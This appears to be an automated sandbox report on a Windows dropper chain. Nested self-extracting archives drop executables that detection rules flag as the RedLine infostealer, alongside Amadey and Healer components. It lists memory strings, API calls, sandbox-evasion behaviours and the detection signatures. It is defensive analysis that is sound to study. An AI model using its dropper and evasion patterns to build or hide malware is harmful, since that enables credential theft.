                          Source: faC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, bvr38xq.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                          Source: bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                          System Summary

                          Source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 0_2_008D1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe Code function: 1_2_00A01F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 1_2_00A01F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe Code function: 2_2_00A91F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 2_2_00A91F90
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008D3BA2 0_2_008D3BA2
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008D5C9E 0_2_008D5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe Code function: 1_2_00A03BA2 1_2_00A03BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A05C9E1_2_00A05C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A93BA22_2_00A93BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A95C9E2_2_00A95C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeCode function: 4_2_0162F7C84_2_0162F7C8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeCode function: 4_2_0162F4084_2_0162F408
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 645130 bytes, 2 files, at 0x2c +A "fxV11fe.exe" +A "doa18JW.exe", ID 1919, number 1, 27 datablocks, 0x1503 compression
                          Source: fxV11fe.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 453990 bytes, 2 files, at 0x2c +A "faC80kI.exe" +A "cEB8028.exe", ID 1730, number 1, 21 datablocks, 0x1503 compression
                          Source: faC80kI.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50172 bytes, 2 files, at 0x2c +A "atn32.exe" +A "bvr38xq.exe", ID 1830, number 1, 6 datablocks, 0x1503 compression
                          Source: file.exe, 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeSection loaded: sfc.dllJump to behavior
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe 9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          Source: file.exeReversingLabs: Detection: 69%
                          Source: file.exeVirustotal: Detection: 59%
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_008D1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A01F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00A01F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A91F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00A91F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\atn32.exe.logJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/8@0/1
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_008D597D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_008D3FEF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeCode function: 3_2_00007FF815F51B10 ChangeServiceConfigA,3_2_00007FF815F51B10
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: bvr38xq.exe.2.dr, BrEx.csBase64 encoded string: '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
                          Source: 4.0.bvr38xq.exe.d70000.0.unpack, BrEx.csBase64 encoded string: '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
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_008D4FE0
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_008D2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCommand line argument: Kernel32.dll1_2_00A02BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCommand line argument: Kernel32.dll2_2_00A92BFB
                          Source: C:\Users\user\Desktop\file.exeAutomated click: OK
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeAutomated click: OK
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: wextract.pdb source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, doa18JW.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: file.exe, fxV11fe.exe.0.dr, faC80kI.exe.1.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: faC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, atn32.exe, 00000003.00000000.306843047.0000000000232000.00000002.00000001.01000000.00000006.sdmp, atn32.exe.2.dr
                          Source: Binary string: .;C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
                          Source: Binary string: C:\xotelogiwax.pdb source: fxV11fe.exe, 00000001.00000003.305814523.00000000050BF000.00000004.00000020.00020000.00000000.sdmp, cEB8028.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D724D push ecx; ret 0_2_008D7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A0724D push ecx; ret 1_2_00A07260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A9724D push ecx; ret 2_2_00A97260
                          Source: cEB8028.exe.1.drStatic PE information: section name: .miyi
                          Source: cEB8028.exe.1.drStatic PE information: section name: .xiguda
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_008D2F1D
                          Source: atn32.exe.2.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_008D1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeCode function: 1_2_00A01AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00A01AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exeCode function: 2_2_00A91AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00A91AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe TID: 2620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe TID: 5164Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe TID: 6120Thread sleep count: 3909 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Window / User API: threadDelayed 3909
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-2451
Source: C:\Users\user\Desktop\file.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2575
